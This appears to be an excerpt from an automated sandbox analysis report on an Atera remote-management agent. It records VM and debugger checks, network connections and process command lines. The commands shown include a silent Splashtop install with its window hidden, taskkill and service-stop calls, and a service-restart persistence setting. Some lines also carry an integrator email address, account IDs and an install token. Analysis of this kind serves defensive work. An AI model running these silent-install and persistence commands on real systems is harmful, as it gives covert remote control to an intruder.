                                Source: svchost.exe, 00000023.00000002.2932377741.0000015753040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.windowsupdate.commsdownloadupdatev3statictrustedrendisallowedcertstl.cabSg
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197809436.000002E967BFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeata
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface0
                                Source: svchost.exe, 00000023.00000002.2931955081.0000015753013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f09
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197776980.000002E967BF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197809436.000002E967BFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdownv
                                Source: svchost.exe, 00000023.00000002.2932960901.00000157530BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@friendlyname"vmware virtual disk"OCALE
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197776980.000002E967BF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197707990.000002E967BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: svchost.exe, 00000023.00000002.2932377741.0000015753040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStopped1w
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E591E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`X
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197776980.000002E967BF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStoppedervi
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStoppedl
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service0
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ervicevmickvpexchangeHyper-V Heartbeat ServicevmicheartbeatH
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStoppedkv
                                Source: svchost.exe, 00000023.00000002.2935041284.00000157530D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,@friendlyname"vmware virtual disk"
                                Source: rundll32.exe, 00000004.00000002.1731816789.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1841969761.0000000002936000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1956064131.000001BE7B4B8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2671597333.0000021732780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStopped
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: svchost.exe, 00000023.00000002.2931955081.0000015753013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1AName
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk#
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                                Source: svchost.exe, 00000023.00000003.2381617121.00000157530EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%\System32\fveui.dll,-844works\AteraAgent\AteraAgent.exe
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197707990.000002E967BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"L
                                Source: C:\Windows\Temp\SplashtopStreamer.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00414B86 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00414B86
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004292D0 _memset,_vswprintf_s,GetLastError,GetCurrentProcessId,OutputDebugStringW,36_2_004292D0
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004214F2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,36_2_004214F2
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD2064 mov ecx, dword ptr fs:[00000030h]37_2_00BD2064
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD8A75 mov eax, dword ptr fs:[00000030h]37_2_00BD8A75
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00425244 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,36_2_00425244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess token adjusted: Debug
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041FAA3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0041FAA3
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00414B86 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00414B86
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00417EFF SetUnhandledExceptionFilter,36_2_00417EFF
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00412FD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00412FD0
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC8AD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00BC8AD2
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC153F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00BC153F
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC16CC SetUnhandledExceptionFilter,37_2_00BC16CC
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC0F8B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_00BC0F8B
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279DDCD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00007FF6279DDCD4
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279E07D8 SetUnhandledExceptionFilter,40_2_00007FF6279E07D8
                                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, explorer.exe37_2_00BB6949
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"Jump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: C:\Windows\Temp\unpack\PreVerCheck.exe "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="000111.financeiro@yamahaconcessionaria.com.br" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000llkxmiab" /agentid="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kin0=" 001q300000llkxmiab
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="000111.financeiro@yamahaconcessionaria.com.br" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000llkxmiab" /agentid="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kin0=" 001q300000llkxmiab
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC116F cpuid 37_2_00BC116F
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: __snwprintf_s,GetLocaleInfoW,PathFindFileNameW,_memset,GetModuleHandleW,GetProcAddress,LoadLibraryExW,36_2_004076AA
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: GetLocaleInfoA,36_2_00424CFE
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
